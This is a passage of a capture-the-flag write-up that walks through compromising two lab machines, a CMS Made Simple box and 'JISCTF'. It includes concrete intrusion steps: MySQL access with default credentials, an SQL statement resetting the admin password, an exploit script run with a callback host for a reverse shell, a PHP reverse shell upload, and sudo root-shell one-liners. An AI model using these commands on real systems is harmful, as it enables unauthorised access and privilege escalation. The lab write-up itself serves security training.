python3 dirsearch.py -u http://192.168.152.74 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 –full-url

I attempted to bruteforce the login for phpmyadmin and for CMSMS login. I was unable to find any valid credentials for either.

I was however, able to login to MySQL remotely with the credentials root:root.

mysql -u root -p -h 192.168.152.74

From here we can view the databases and move into the cmsms_db database.

use cmsms_db;
show tables;

Looking at the tables that exists in the database we select all columns from cms_users table.

select * from cms_users;

This reveals a MD5 password hash for the admin account. I was unable to crack this with several word lists however.

As we are the root account on MySQL we can instead change the password to something we know and use this to login to CMSMS.

Run the following command to create a new password of ‘weakpass’ for the admin user:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'weakpass'))) where username = 'admin'

The password has now changed:

We can then move over to the /admin/ directory in the browser and login with the new credentials.

Searching for exploits on CMSMS now that we are authenticated gives a few results.

As we are running version 2.2.13 I will try the Arbitary file upload for version 2.2.14.

CMS Made Simple 2.2.14 – Arbitrary File Upload (Authenticated)
CMS Made Simple 2.2.14 – Arbitrary File Upload (Authenticated).. webapps exploit for PHP platform
www.exploit-db.com

Once the python script was downloaded I executed with the following syntax:

python3 48779.py –url http://192.168.152.74/admin/login.php -u admin -p weakpass -lhost 192.168.49.152 -l 80

When ready I set a netcat listener and prompted the script to continue resulting in a shell as www-data.

Moving around the target machine we have a .htpasswd file hidden in /var/www/html/admin/. When running cat on the file we get the value TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=.

From here we can decode with base64 then base32 as this string is double encoded.

We can then use su to switch to the armour account and login with the password we have discovered.

Checking sudo -l shows we can run python as root without declaring a password.

We can then spawn a root shell with python.

sudo python -c ‘import os; os.system(“/bin/sh”)’

pg-jisctf-play

JISCTF

Nmap
sudo nmap 192.168.152.25 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking out port 80 directs us to a login page on /login.php.

Running dirsearch.py against the web server reveals robots.txt

python3 dirsearch.py -u http://192.168.152.25 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 –full-url

The contents of robots.txt is shown below:

User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

Browsing to /admin_area shows the page below.

Viewing the source reveals sensitive information:

We can then login to /login.php with the credentials shown above. The following page reveals a web page for uploading files.

I then uploaded a PHP reverse shell which after upload showed a ‘success’ status message. Knowing the directory /uploaded_files/ exists we can then browse to this followed by the uploaded files name: http://192.168.152.25/uploaded_files/phpshell.php.

The page should hang and we will receive a shell on our netcat listener.

I could not see that Python was installed on this machine so I instead used the following command to upgrade the shell:

/usr/bin/script -qc /bin/bash /dev/null

From here I transferred over linpeas from my attacking machine and let it run. The script picks up the username ‘technawi’ which is an alternative user on the box.

Running cat on the credentials.txt reveals login information. We can then use su to switch to the technawi user.

Checking sudo -l against the user reveals we can any command as any user on this machine.

We can then run the command below to spawn a root shell.

sudo /bin/bash